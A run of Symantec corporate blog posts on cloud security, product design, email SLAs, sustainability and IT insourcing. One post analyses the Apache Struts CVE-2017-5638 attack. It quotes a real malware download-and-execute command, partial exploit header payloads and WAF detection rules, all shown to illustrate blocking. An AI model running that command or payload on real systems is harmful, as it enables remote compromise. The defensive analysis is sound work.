Symantec is helping organizations safely adopt Facebook Workplace with an integrated cloud security system to safeguard sensitive data, protect against threats, and maintain compliance with regulatory standards.

CloudSOC will support Workplace with all the capabilities that Gartner defines as core functionality for a Cloud Access Security Broker (CASB) including visibility, compliance, data security, and threat protection using event logs, API integration, and CASB gateway for inline inspection.

Visibility

Companies can use CloudSOC Audit today to discover, monitor and control employee use of cloud applications including Workplace. Audit helps organizations meet regulatory requirements by providing key information on over 100 different risk attributes for cloud applications to help organizations perform mandatory monitoring and risk analyses. Audit provides information on usage, traffic, locations, users, and threats associated with Workplace based on event log data from popular proxies and firewalls as well as Symantec ProxySG, Web Security Service, and SEP Manager.   

Audit can identify which employees are using Workplace and if employees are using another potentially unauthorized platform. Audit can be used to reduce redundancy and costs by identifying redundant apps and subscriptions. With this information organizations can identify if other apps are being used and to push their employees to use Workplace as the official collaboration platform.

Data Security 

Cloud applications like Workplace make collaboration in the cloud very easy. They also make it easy to overshare confidential content. CloudSOC enables safe collaboration by governing and securing the data that is shared using Workplace. It will classify sensitive data with native DLP, identify which users are associated with files containing confidential data and control how that data can be accessed. Enterprises using Symantec DLP can extend their existing DLP to the cloud using integration with CloudSOC.

Threat Protection

Bad actors target cloud apps. An account can get compromised by malware or by a brute force attack and malicious insiders can use cloud accounts to exfiltrate data.  CloudSOC will be able to identify abnormal and potentially malicious activity associated with Workplace accounts to identify threats and enforce policies to protect organizations in the cloud.

CloudSOC

We plan to add Workplace support to the CloudSOC CASB Gateway and an API-based Security for Workplace solution this year based on customer demand.  

Great products require building bridges between customer needs and technology through cross-functional thinking and closer collaboration of product management, marketing, and sales teams. Product management excellence provides companies a distinct competitive advantage but achieving high performance consistently is a constant struggle for even the most innovative companies. Reducing time to market with a data-driven product development and accomplishing competitive distinctiveness are critical to the success of any product organization.

At Boston BSides last year, we discussed information-driven product design (IDPD), a methodology that simultaneously increases a product’s cyber security and enables data scientists to gain deeper insights into user behavior. Now we can share how information-driven product design was leveraged to launch one of Symantec’s fastest products in its history.

Even when utilizing agile methodologies, launching a General Availability product in a big company is a time-consuming process due to cyber security and legal hurdles of the traditional Product Life Cycle (PLC). However, information-driven product design enabled us to a) design b) build and c) launch a product, including a full PLC approval, within 4 months. Typically the PLC process takes about 6 months.

Figure 1. Three Key Personas

Consider this scenario. A cyber insurance provider is interested in bundling a cyber security self-assessment with its existing products, while the end user would like to get benefit from the advice of a Symantec cyber security Consultant, based on the results of the assessment.

Product Challenge

To do this, our team had to meet two seemingly contradictory customer needs – shareability and exclusivity. On one hand, the customer should be able to exclusively share the cyber security assessment with their multiple customers holding cyber insurance policies. At the same time, these customers should not be able to share the assessment link with other users by posting it on social media. In addition, results of the assessment needed to be available both to the user and Symantec for further consultation in the future.

Information Driven Product Design

There are two key principles of information-driven product design:

• First, reduce the exposed information accessible to the potential attacker
• Second, increase the useful information available to the data scientists for subsequent research.

Benefits

1. Save Time

Applying the first IDPD principle to cyber security assessments: reducing information available to potential attackers and thus reducing time to market

As the cyber security assessment captures potentially sensitive information about the users (e.g. ABC Corp. encrypts data with sha2), we decided to completely remove the login functionality, making it anonymous. This anonymous assessment feature defends against a potential attacker breaking into Symantec’s database and stealing every assessment answer; or, in a less extreme scenario, prevents compromising individual user credentials in case of password reuse.

But how do we make this anonymous survey exclusive?

To overcome that challenge we built a unique, one-time link generator, with links expiring after the assessment starts. This way our customer receives approximately 1000 unique links for the cyber security assessments and shares one each with their user, while no social media post of the expired link can go viral.

Figure 2. Workflow. 

Symantec shares access to the security assessment with its customer, who then can forward individual invitations to their users. These invitations expire on activation and thus cannot be spread on a public forum.

2. Increase Insight

Applying the first IDPD principle to cyber security assessments: increasing relevant user information for data scientists and improving our understanding of the user behavior

To capture all valuable user information, we still hold all the answered assessments of the user in our database identifying them with a unique code that we display on the summary report available at the end of the assessment. If the user chooses to contact Symantec to discuss the assessment results, we can pull up the full result based on the code but without revealing the identity of the user. Even our security consultants don’t know whose data they are discussing, while full access is available to statistical averages based on industry and company size. Thus we can study detailed security trends in their historical perspective using the IDPD principles.

Figure 3.Walk through the anonymous cyber security assessment

Walk through the anonymous cyber security assessment

When a user receives a one-time link that expires on click, while no login is required and user is prompted to chose an industry and company size and answer a few cyber security questions. In the end, user receives a summary PDF report.

Information-driven product design is a rapidly developing framework with more examples emerging every day. Here, we describe how it enables faster product launch, as no personally identifiably information (PII) is available to potential attackers. An additional benefit is that, both the cyber security assessment of the product as well the legal clearance by privacy lawyers and terms of use have been achieved within weeks. In addition, the user receives a better experience by not having to login, create a new user account, or give away their email. On the other hand, all the valuable information is captured for further analysis and consultation. Thus information-driven product design is the foundation of one of the fastest Symantec product launch in its history over the past 35 years and can contribute to reduced costs and increased time to market for other products.

Background Image on Blogs "Quilted" Page: 

Globe Blog Image.jpg

When it comes to two companies joining forces, the cliché in corporate synergy is that 1 plus 1 will equal 3 – the whole is greater than the sum of its parts. However, the integration of Blue Coat and Symantec threat intelligence has created an entirely new formula: 1 plus 1 equals 3.2 million.

In October of last year we announced the first results of combining our Blue Coat and Symantec threat intelligence, comprising trillions of rows of security data.  After further integration of our combined security telemetry, as well as artificial intelligence and machine learning-based technologies across our portfolio, Symantec products are now blocking an additional 3.2 million attacks every day.  A significant portion of this gain comes from the sharing of email telemetry across our offerings, in addition to sharing web and endpoint telemetry.  In the past year, we’ve seen a significant increase in the number of attacks launched through email, particularly via malicious URLs.  This means that companies need full visibility into both email and web traffic, in addition to endpoints, understand the full picture of the threat landscape. 

Additional results from the integration with Blue Coat include Symantec now protecting 163 million email users, 80 million web proxy users, 175 million consumer and enterprise endpoints, and processing nearly eight billion security requests across these products every day. This level of visibility across endpoint, email, and web traffic allows Symantec to discover and block targeted attacks that would otherwise be undetectable from any one control point. What’s more, our combined portfolio provides the foundation for Symantec’s Integrated Cyber Defense Platform, which allows Symantec products to share threat intelligence and improve security outcomes for customers across all control points.

Symantec is the only vendor to connect endpoint, email, and web protection across a single integrated intelligence platform, which was made possible through the acquisition of Blue Coat.  Symantec + Blue = 3.2 Million additional attacks blocked every single day for our customers.  It turns out that 1+1 is a lot bigger than 3. 

Summary

Apache Struts is a popular open-source MVC web application framework for Java-based web applications. A recently announced 0-day security vulnerability (CVE-2017-5638) against this framework is being actively exploited. It impacts the Jakarta-based multipart parser used in Struts 2.

Exploitation attempting to land remote code execution and command injection payloads have been identified.

The Symantec Web Application Firewall solution leverages a unique Content Nature Detection approach that is able to correctly identify CVE-2017-5638 attacks without requiring a signature update or virtual patch. Symantec Web Application Firewall (WAF) customers are protected by default, and no additional action is required.

Attack

There are many POC attack payloads flooding the web, including this exploit in the Metasploit Framework: https://github.com/rapid7/metasploit-framework/issues/8064 . For our analysis we will use the python script from the core of this exploit. When running the script against a vulnerable target:

… the Wireshark packet capture shows the HTTP request being issued:

The response from the vulnerable server contains the result of running the command as it would run on local host. Command injection chaining allows for truly powerful exploitation variants, from a simple "whoami" and "ls –l" sequences to sophisticated firewall and IDS disabling as shown here.

Mitigation

Let’s deploy the Symantec Web Application Firewall (WAF) and observe how the attack is correctly detected and blocked. With the Symantec WAF deployed in front of the vulnerable Struts server, the following response is returned:

urllib2.HTTPError: HTTP Error 400: Bad Request

Note: The WAF configured by default to return Status 400 for blocked requests.

The WAF log for the request shows the Code Injection and Analytics Filter engines have identified the attack:

"Code Injection;Command Injection""[{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"},
{"eng":"analytics_filter","part":"header","rule":[“AF-1006-3","AF-1006-20","AF-1006-21","AF-1006-52"],"data":"%{(#_='multipart…"}]"

The important aspect is that the Symantec WAF detected and blocked this attack without requiring a signature update. The log shows that our WAF correctly detects the value of Content-Type header as malicious and categorizes it as Code Injection and Command Injection. Now if the attacker wants to gain a foothold on the compromised machine they might try a more elaborate Command Injection. For example, this nasty payload from recently discovered Linux ARM ELF_IMEIJ.A malware:  

wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1;

This attack is quite unique as it includes a Java code in addition to bash command sequence. Despite the payload modification, the Command Injection attack is detected correctly:

"Command Injection;Code Injection" 40 - "[{"eng":"injection.command","part":"header","host":"linux","version":"3","data":"%{(#_='multipart…#cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.command","part":"header","host":"osx","version":"3","data":"%{(#_='multipart…cmd='wget -O \/tmp\/Arm1 http:\/\/192.154.108.2:8080\/Arm1;chmod 0777 \/tmp\/Arm1;\/tmp\/Arm1;'…"},
{"eng":"injection.code","part":"header","lang":"php","data":"%{(#_='multipart…"},
{"eng":"injection.code","part":"header","lang":"java","data":"%{(#_='multipart…"}]" - - WAF_SCANNED

SYMC WAF Protection

The Symantec Web Application Firewall uses Content Nature Detection engines, which satisfy the need for strong detection capabilities in a scalable system capable of handling Enterprise-grade traffic profiles. It is a fundamental shift away from "known bad" pattern matching, and is instead based on understanding the nature of the content and how backend infrastructure components handle data.

Detecting and blocking well-known attacks is something that all modern WAFs do fairly well. Unfortunately this does not represent the real-world exploit payloads from a sophisticated attacker. There are a continually evolving set of evasion techniques exposing fundamental processing holes in existing WAF technology.

The Symantec WAF addresses inherent flaws in the traditional signature-based pattern matching approach. The payloads for CVE-2017-5683 are blocked by default, without requiring a signature update or virtual patch. This greatly reduces the operational overhead associated with type of vulnerability. Symantec WAF customers were also protected before this vulnerability was publically disclosed.

Conclusion

Systems leveraging the Jakarta-based multipart parser used in Apache Struts 2 are advised to update to v2.3.32+ or v2.5.10.1+.

Symantec WAF customers are protected by default, and do not require a signature update or virtual patch for protection.

Existing ProxySG customers who are not running WAF controls can deploy a virtual patch in policy for immediate protection. For example:

; ProxySG 6.5.x<proxy>
request.header.Content-Type.substring="%{(#" force_exception(invalid_request)

; ProxySG 6.6+
<proxy>
http.request.normalization.default("urlDecode:(path),urlDecode:(header),urlDecode:urlDecode:htmlEntityDecode:(arg_name,arg)")<proxy>
http.request[header].substring="%{(#" force_exception(invalid_request)

“Each of us can make a difference, and together accomplish what might seem impossible."

- Wangari Maathai, Founder of the Green Belt Movement and the 2004 Nobel Peace Prize Laureate

Last week, Cecily Joseph, Symantec's Vice President, Corporate Responsibility, authored an article on the Huffington Post “From Me to We: In Today’s World, What Does it Mean to Be a Responsible Corporate Citizen and Leader?” that emphasized the transition of corporate responsibility from focusing solely on a company’s impact to the opportunities and responsibility to impact the world on a global scale. Within this, Cecily spoke about the importance of collective action to achieve broader impacts. Today collective action can stem from passionate employees, companies and peers, an entire industry, multi-stakeholder groups, or a combination of all to address issues critical to the livelihood of our planet and communities.

As millions across the world celebrate Earth Day this weekend, the importance of collective action is top of mind. In 2020, Earth Day will celebrate its 20th anniversary as one of the world’s largest advocacy efforts for the environment that has grown from a movement of 20 million people to engaging 200 million people in 141 countries. Through the Earth Day Network’s Billion Acts of Green, over two billion acts for the environment have been logged, with the goal to reach three billion by 2020.

It is easy to overlook the impact that individual actions have, however, imagine if these two billion people overlooked their contributions? What if Wangari Maathai never believed in her power to make a difference? Individual actions contributed to the 899 thousand tons of PET plastic bottles recycled in the US in 2013, however, at the same time, individual actions contributed to more than two times this being wasted (2 million tons)[1]. From our diets to transportation to our consumption patterns, as humans we are the driving force, on both a collective and individual scale, to influencing the future of our planet.  

At Symantec, we recognize the impact our business has on the environment and are focused on developing more sustainable products, reducing energy consumption and our carbon footprint, meeting and exceeding compliance regulations and serving as stewards of our environment.

We also believe every individual can make a difference and together our actions empower each other and communities in new and innovative ways. Therefore, a key component of our environmental strategy includes engaging employees in the environment. From our Green Teams to community relations committees to local volunteer programs, we are empowering our individuals to maximize the positive benefits we collectively have as a business and a global community. 

Symantec’s 16 global Green Teams hold events throughout the year to support environmental sustainability such as this Beach Clean-up in Cape Town, South Africa with partner CleanC.

We currently have 16 green teams globally, with 22 leaders and over 90 employees participating. Each Green Team develops its own initiatives based on the particular environmental needs of its site, region, and country, with support from Global Green Team regional leads, our Global Coordinator, Amanda Davis, Senior Manager, CR and the Environment, and Global Green Team Executive Sponsor Chris Abess, VP, Pricing Strategy and Operations.

Our Green Teams continue to have a pivotal impact on our environmental strategy and goals, such as our newly stated goal to reduce emissions by 30 percent by 2025 (compared with FY15). They have helped us achieve a five-percent reduction in greenhouse gas emissions in the first year since launching our emissions goal and in FY18, we are launching a global Green Team strategy and campaign to improve energy efficiency in further support of this. 

Additionally, Green Teams contribute to reducing waste through campaigns such as “One Mug, One Planet”, identify opportunities for the Facilities and IT teams to implement changes in Symantec's buildings, educate fellow employees about personal behavior changes they can make, inspire and engage fellow employees through initiatives such as the “Green Talks” environmental lecture series, and every year lead Earth Day activities across the world. Examples of this year’s Earth Day celebrations include:

• Mountain View’s 8th Annual Earth Day Green Fair with 27+ exhibitors across the areas of Energy Efficiency, Water Conservation, Waste Reduction, Commute Alternatives, Healthy Homes, and Healthy Living
• Dublin’s Grow it Yourself Garden workshop that fuels the corporate cafeteria
• Pune will partner with nonprofit Youth for Seva to educate youth on the impacts of plastic waste
• Reading, UK is organizing two-days of volunteering with various charities
• Cape Town will partner with our community relations and Symantec Women’s Action Network (SWAN) to develop a community garden enabling the low-income area to become more self-sufficient

Outside of our Green Teams, we aim to influence the environmental impacts of our employees both within and outside the office:

• For example, through SymFit, our fitness center and health/wellness benefits for employees, we are offering cruiser bicycles for employees to rent and ride around campus as well as exercise machines, both telling users how much energy they have saved.
• In February our Mountain View headquarters expanded the company’s centralized waste collection program, by eliminating all individual trash and recycling bins on newly designed and refreshed floors. The initiative eliminates use of over 1,000 plastic trash liners changed regularly, encourages employees to move from their desks consistently, and is also increasing individual awareness of what we dispose of. 
• In August 2016, Symantec began a partnership with Scoop, an application that connects commuters and carpoolers. Membership and interest has continued to increase from employees looking to reduce their footprint, those simply looking to streamline their commute, and those looking to do both. Currently, 412 Symantec employees are using the service, avoiding an average of 29 cars from the parking lot in Mountain View each day, and saving 90K miles of driving equating to over 81K pounds of CO2 (or 40.2 tons).

“I use Scoop to do my part in helping to reduce pollution and traffic. My commute has gotten a lot better since I can use the carpool lanes and my commute time has been reduced!” - Suryakanth, Software Engineer, Symantec Inc.

Changing people, changing communities and changing the world continues to be at the heart of our corporate responsibility. As individuals, Earth Day provides us a chance to join others, but also to ask ourselves the challenging question – what changes can we make, what impact can we have and how can we ensure a positive future for our planet?  

Is your organization moving to cloud-based email and productivity apps? Whether you’re taking the plunge on Office 365, Gmail or other services, it pays to pause and first evaluate the security that your new provider is offering. What do they offer? Where do you need additional security? And amidst all the features and claims made by each vendor, how can you really tell which one offers the most robust and reliable email security?

Our suggestion: Check the vendor’s service level agreements (SLAs). The more robust they make their SLAs, the more capable and confident they are in their services. A company that won’t commit to service guarantees likely can’t deliver those service guarantees. In the email security space, that typically translates into five specific areas of need:

1. Malware Protection

2. Spam Capture

3. Email Availability

4. Email Delivery

5. Email Latency

The Symantec Commitment

At Symantec, we’re serious about providing the most dependable email security service, so we put money behind our commitment. Our SLAs are the most robust in the business, and we publish our performance against those service level targets every month. Most importantly, we pay you if we don’t meet these targets since our SLAs are punitive.

Specifically, this is how we measure up against the five service guarantee areas:

     1.  Malware Protection

In our view, even one infection is too many. We’re the only service that will provide 100% service credit for threat efficacy after just one infection during the calendar month. Our competitors never pay out more than 50% – even after multiple infections.

Why Is This Important?

Email continues be the #1 threat vector for companies, and these attacks are getting more sophisticated. For instance, our latest Internet Security Threat Report identified a 55% increase in spear phishing and a 13X increase in business email compromise, resulting in billions of dollars in losses to organizations. Email has also become the most prevalent channel for ransomware to infiltrate companies.

      2.  Spam Capture

Symantec guarantees greater than 99% spam efficacy capture for English-language emails, and 95% for non-English emails. We’re the only email security provider to guarantee spam capture in English and other languages.

Why Is This Important?

Typically, nearly half of the email messages that users receive are spam. If you don’t have robust filtering in place, your email will quickly fill with spam and become unmanageable for your users. Moreover, not all spam is in English, and many email security systems don’t filter (or won’t commit to filtering) spam in other languages. You could easily find your email system overwhelmed by non-English spam unless you have this protection.

      3.  Email Availability

If service availability falls below 100%, Symantec provides a credit for that month. Based on SLAs, other vendors believe 95% availability is good enough. We don’t. We even provide you a full cancellation clause if our availability falls below 95%.

Why Is This Important?

In today’s 24 x 7 business environment, you need email security to be operating all the time, filtering and delivering messages as soon as people send them. Are you comfortable with 1% or 2% downtime? If your provider only guarantees 95% uptime, are you OK with email security being down for 18 days per year? How does this impact trust in your business if you or your customers are not able to communicate due to downtie?

     4.  Email Delivery

Symantec is the only service that guarantees 100% delivery of all email sent to or from customers, assuming the email was received by Symantec and did not contain a virus, spam or other filtered content. And if we don’t meet 100% delivery, you can cancel your contract.

Why Is This Important?

Not getting email is almost as bad as getting malware. Can you be confident that all your outgoing and incoming email are being delivered? If it’s not 100%, which emails aren’t going through?  And how is this impacting customer relationships and business opportunities? Your business depends on communication, and reliable email delivery is foundational.    

    5.  Email Latency

We deliver customer email almost three times faster than our competitors. In fact, if email averages more than a one minute round trip, we’ll give you a partial service credit – and a full service credit if email latency exceeds an average of a three minute round trip.

Why Is This Important?

Businesses today use email as a universal form of communication, including both “read it whenever” updates and “take immediate action” notices. If your security service takes too long to scan and filter emails, your employees and customers will be left waiting. This can be a big problem when they are expecting time-sensitive information.

Bottom line: We lead the market in cloud-based email security for Office 365, Google Apps and more – fueled by the world’s largest civilian threat intelligence network, as well as advanced machine learning, advanced heuristics, comprehensive link following (both real-time and click-time) and advanced threat protection. We protect 163 million email users and scan more than 2 billion emails every day. And we’re willing to stand behind it all with the most aggressive SLAs in the industry.

Follow Symantec Email Security on Twitter.

Background Image on Blogs "Quilted" Page: 

it-showcase-symlogo.jpg

As promised earlier this month, I’m kicking off our IT Showcase with the topic of insourcing. I was recruited to Symantec in February 2014 specifically to bring the information technology function back in house after eight years. Outsourcing nearly all of the company’s IT functions to a third party vendor had negative consequences—including repeated network outages and equipment, services and applications were allowed to atrophy. In short, IT had gone dark, becoming complex, expensive, slow and inefficient.

When I look back on that effort in an InformationWeek interview, I am reminded that bringing IT in house can be as complicated as outsourcing—sometimes even costlier with contract termination fees, the expense of building a more robust data center, application and lab migration and decommission, software license transfers, and new hiring and development. But insourcing can also serve as the impetus for driving IT transformation—improving technology, pushing more services to the cloud, and operating more effectively at reduced cost. That certainly was our goal and experience.

Some key insourcing questions to consider: 

1) What are my termination rights and responsibilities?

2) Can my in-house IT team support the future state?

3) How long will it take?

Tackling this challenge required several initial steps. The first was to define our IT vision and strategy, and my initial plan covered several key imperatives (see sidebar). The second was to complete an organizational redesign—since most IT employees were in administrative roles primarily overseeing the outsourcing vendor, technologists were needed in several key networking and infrastructure, communication and collaboration, and IT architecture roles. I’m a strong advocate of an IT services-led model which assigns 100% of service responsibility to individual owners—this practice was also established. It was a critical departure from how IT had been run historically, and resulted in improved partnerships between IT and the business units, and more effective management of the company’s strategic goals.

With a focus on simplification, operational excellence, technical leadership and outstanding user experience, we launched our first strategic initiative:  Build and deliver a new, next generation secure data center and network services—absolutely critical and foundational. Very significantly, we built our Next Generation Secure Data Center (NGSDC) in our own virtual private cloud, using a software defined network. Phase one (pre-production) was deployed in December 2014—within less than a year. It included identification of the technology architecture stack and key strategic partners—Cisco, NetApp and VMware—which enabled IT to leapfrog existing technology capabilities, including network, compute and storage. Full IT production of NGSDC was delivered by August 2015.

Our new NGSDC meant a significant improvement in how IT services were delivered and a substantial decrease in the cost of IT over the past three years (more on this in a future blog). During our primary insourcing period—covering five quarters from 2014-2015—we achieved a 25% reduction in IT expenses. Further insourcing enabled us to deliver 35% of applications from the cloud (and subsequently enabled us to move more apps to the cloud), transforming employee productivity and collaboration services globally.

Assigning a leader to drive all of our insourcing activity was a key success factor. IT Strategy, Planning and Business Operations Vice President Mark Giles managed this work full-time, serving as a hub for all of the moving parts.

“Driving change is always hard, but it is accelerated and easier when everyone is aligned to common goals,” says Giles. “Foundational was establishing a transition framework that enabled all parties to understand their part in achieving our joint success. Service owners led joint teams to build end-to-end operations at Symantec, maintain existing operations during transition and doing no harm to Symantec or our outsourcing partner as we exited. Our teams executed flawlessly, we transitioned on time, and with no disruption to our operations. What could have been a war story, was a true ‘win-win’ and was a major accomplishment for everyone involved,” Giles adds.

Finally, we renegotiated a new contract with our vendor. It might have been an awkward, uncomfortable conversion but instead was a true partnership. Our vendor knew of our mandate to bring services in-house, and was committed to ensuring a smooth transition. As a result, we signed a new vendor agreement in December 2014—in less than a year—outlining reduced scope and an evolution away from our outsourcing partner.

Overall results?  Employees noticed new speed and agility in how their IT services were delivered. Operations improved dramatically. Over a two-year period, we’ve seen a reduction in critical outages of 98%. Provisioning a server, which previously took four months, is now accomplished in 15 minutes.

It was both exciting and rewarding to see this significant increase in service delivery while at the same time reducing expense. Our mantra was “faster, cheaper, better.” Reestablishing a high performing IT team and organization internally set us up well to tackle new challenges. I’ll talk more about those in my next blog.

I’d love to hear your thoughts on our experience—comments are always welcome!

Sidebar

Insourcing Strategic Initiatives

1. Build and deliver a new, next generation secure data center and network services

2. Drive efficiencies and deliver new business models and capabilities

3. Uplift our security capability, using our own technology, dramatically improving the security posture at Symantec

4. Improve employee productivity and collaboration

5. Adopting a bold cloud model for all major applications

6. Deliver end-to-end data services

7. Demonstrate ‘Symantec Inside’ product/services successes

8. Empower and develop IT employees

More than 80 percent of states lack the funding to develop a sufficient cybersecurity defense.

There are many ways to think about that percentage, but amazingly, there will be some that are surprised that number is so low. State governments are at the forefront of the cybersecurity battle, but unlike their partners in the federal government, find themselves more hampered by fiscal and personnel shortfalls.

To help state and local governments, a group of federal lawmakers recently introduced the State Cyber Resiliency Act. The act would leverage the existing State Cyber Resiliency Grant program to assist state, local and tribal governments in preventing, preparing for, protecting against, and responding to cyber threats. Basically, it is sending a lifeline to state and local governments.

States already can access federal funding through a Homeland Security grant program, but that pot of money rarely is distributed for cybersecurity. The program was created to support anti-terrorism and police training, and the funding usually ends up being used for emergency preparedness and first responders.

For states, more resources are needed for more effective cyber programs. Like the federal government, states house personal information of most every man, woman and child within their borders. States, though, typically lack the financial resources to invest heavily in cyber defenses and, even if they did, must fight a very real talent shortage of trained cyber personnel. That is doubly true in rural areas that lack a strong private technology presence.

This program seems like a great idea. While state and local governments may be behind now, it is an excellent time to invest in cybersecurity resources, especially in integrated, comprehensive solutions that are developed to work together to offer a holistic capability. With end-to-end cybersecurity solutions, state and local governments can now be assured that their cybersecurity posture can adequately protect their networks, while offering them visibility into emerging threats.

No matter how far behind state and local agencies find themselves they can quickly catch up to protect the critical information floating around their networks. The Trump administration, so far, has made cybersecurity a priority and this bill from Congress shows the strong commitment that lawmakers are showing for improved cybersecurity from the feds on down.

Dan Lohrmann, the longtime Chief Information Security Officer for the state of Michigan, talked about how a program like this would have been beneficial during his time working in state government.

“We were able to get millions of dollars in federal Department of Homeland Security (DHS) grants for cybersecurity for many different projects, ranging from new generators for data centers to anti-spam appliances to new encryption for laptops,” he wrote in an article on Government Technology. “Those grant dollars launched Michigan into the forefront of government cybersecurity leadership at the time, enabling us to implement many cyber protections and stop ongoing cyberattacks.”

This bill was recently introduced and sent for committee consideration. It is definitely one worth following as it offers states and localities an aid in acquiring key resources to improve their cyber defenses.

The State Cyber Resiliency Act has been introduced in both the House and Senate. If you are interested in keeping up-to-date on the progress of each, here are the direct links – House, Senate.

Last week, Corporate Responsibility (CR) Magazine announced their annual 100 Best Corporate Citizens List and we are proud to announce that Symantec has climbed 52 spots to #35! The ranking, in its 18th year, is based on publicly available disclosures for 260 indicators across key CR areas such as philanthropy/community engagement, environmental sustainability, human rights, climate change, employee relations, financial performance and corporate governance. Symantec’s highest rankings were in the areas of employee relations, including diversity and inclusion, (#3) and corporate governance (#5). 

The list looks at three key characteristics for each indicator – disclosure, policy and performance – all of which underline the core mission of CR Magazine and the purpose of the list – accountability. At CR magazine they “believe it’s vital for investors, regulators, customers, suppliers, and employees to know as much as possible about the companies they invest in, do business with, and work for.”

Accountability in this sense extends far beyond financial metrics to how the impacts a company has on its people, communities and the environment. Within CR, trust and transparency are the building blocks of relationships with stakeholders internally and externally who help us make a positive impact and difference in the world.

Each year we look to expand and evolve our engagement and communication with stakeholders through our annual Corporate Responsibility report, ongoing communications such as our CR blog, through targeted disclosures such as CDP and EICC, socially responsible indices such as DJSI and FTSE4Good, and a variety of industry rankings.

This year we continued to expand our policies, drive performance, and improve disclosure, all strengthening accountability for:

• Our planet: Continued implementation of our strategy to meet our ambitious, science-based goal to reduce GHG emissions by 30 percent by 2025 (compared with FY15). This includes optimizing the use of our spaces, implementing energy efficiency projects, leveraging clean and renewable energy sources, and engaging employees in energy conservation. For example, this year we are launching a Green Team campaign to support energy reduction efforts.
• Our customers: Certifying 100 percent of our hardware products as Energy Star by the end of 2015. Additionally, in FY18, we will continue to work with our customers to educate professionals, their families and communities on the changing online safety landscape.
• Our suppliers: Ensuring supply chain responsibility by implementing the Electronics Industry Citizenship Coalition’s (EICC) code of conduct with 100 percent of our Tier One suppliers.
• Our communities and industry: Expanding our signature Symantec Cyber Career Connection (SC3) program that provides a pathway for underrepresented young adults and veterans to enter the cyber security field. To date, 87% of SC3 graduates are employed in cyber security and IT jobs, or are pursuing additional degrees.
• Our people: Through our employee resource groups, public advocacy, and internal policy development, we are creating a culture where diverse talent can thrive and innovate, and better understand and serve our diverse global markets. For example, our publication #iamtech features the experience of technology professionals of diverse backgrounds, and we have been recognized as a leader for LGBTQ professionals, implementing guidelines to support employees transitioning on the job, developing inclusive bathrooms and joining hundreds of leading tech companies publicly standing up for regulation that support people of all backgrounds.   

While we are proud of this recognition, we also understand that true accountability and trust requires continuous improvement and an evolution of our strategy and priorities. It is also requires honesty about where our weaknesses lie. For example, our annual CR report highlights priority areas we are working to more strongly support, it calls out if we have not met a goal on target and when we expect to do so. It also includes comments from our report and strategy review process, where we’ve received over 200 pieces of feedback on strengths and opportunities for improvement.  

As CR magazine highlights:

“Being a good corporate citizen is a goal of most leading organizations, but actually achieving this can be a challenge in today’s business climate. There are many working pieces of a responsible operation—risk management, diversity and inclusion, and the supply chain for example—that make efficient and effective operations quite onerous. So when a company succeeds at being transparent, responsible, and accountable—with all aspects backed up by data—they end up earning a coveted spot on Corporate Responsibility Magazine’s 100 Best Corporate Citizens List.”

The very nature of our business—assuring the security, availability, and integrity of our customers' information—requires a global culture of responsibility. We are proud to be recognized for achieving our mission of bringing together our people, passions and powerful technology to support social and environmental priorities and make the world a better, safer place.

The full list of 2017 recipients can be accessed here. 

For all the talk during political campaigns and even once in office, the true decisions are made when it comes time to determine a federal budget. Each spring the president submits a proposed budget to Congress that highlights the administration’s spending priorities for that year with a clear message: What gets funded is important.

In March, President Trump issued the first proposed budget of his administration. Called the “Budget Blueprint,” this document provided a general overview of where the administration wants to spend money in the upcoming fiscal year. While a number of federal agencies and programs face cuts as the administration looks to scale back government spending, the proposed budget indicates that cybersecurity will continue to be a major priority.

For example, the “Budget Blueprint” mentions the need for the American military to not only be superior on land, at sea and in the air, but also in cyberspace.

“As the world has become more dangerous— through the rise of advanced potential adversaries, the spread of destructive technology and the expansion of terrorism—our military has gotten smaller and its technological edge has eroded,” the budget said.

Overall, President Trump’s proposed budget includes 15 separate mentions of cybersecurity in the 53-page document. While dollar figures are still unclear it is obvious the Trump administration wants to continue to make investments in cybersecurity.

Cyber was one of the growing priorities during the Obama administration as well, as spending on cyber defenses continued to grow each year. It is obvious the Trump administration has similar ideas about cybersecurity, prioritizing cyber defense even as cuts are made elsewhere. Congress will still make changes to the budget, but it would be hard to imagine them looking to make drastic cuts to cyber spending.

There is a clear need for these investments. When federal agencies first built up their cyber capabilities the strategy at the time was to purchase individual systems that secured different parts of the network. Using a best-of-breed solution for each part of the enterprise seemed like a good idea at the time, but as systems became more complex agencies lost visibility into their networks.

That is beginning to change. With comprehensive security systems, agencies can now turn to solutions that protect data throughout its full lifecycle. The increased investments should fund more integrated, comprehensive solutions that are built to work together, opposed to simply applying additional patches in a “band-aid” approach to securing these disparate systems. Agencies will get better visibility into their networks, allowing them to see everything that happens. This was not possible just a few years ago.

We are thrilled that the Trump administration is continuing to prioritize cybersecurity as it is an important component to any technology strategy. The U.S. government holds some of the most sensitive information in the world, and that data needs to be protected. The technology is here to make that mission easier than ever before. Let’s hope the buy-in from the top continues.

Background Image on Blogs "Quilted" Page: 

ISTRBlogImage.jpg

• One in 131 Emails Contained a Malicious Link or Attachment – Highest Rate in Five Years

• Size of Ransoms Spiked 266 Percent; U.S. Top Targeted Country as 64 Percent of Americans Pay Their Ransom

• CIOs Have Lost Track of How Many Cloud Apps are Used Inside Their Companies – When Asked Most Will Say up to 40 When in Reality the Number Nears 1,000 

Mountain View, Calif. – April 26, 2017 – Cyber criminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the U.S. electoral process by state-sponsored groups, according to Symantec’s (Nasdaq: SYMC) Internet Security Threat Report (ISTR)  Volume 22, released today.

“Newsophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus,” said Kevin Haley, director, Symantec Security Response. “The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cyber criminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services.”

Symantec’s ISTR provides a comprehensive view of the threat landscape, including insights into global threat activity, cyber criminal trends and   motivations for attackers. Key highlights include:

Subversion and Sabotage Attacks Emerge at the Forefront

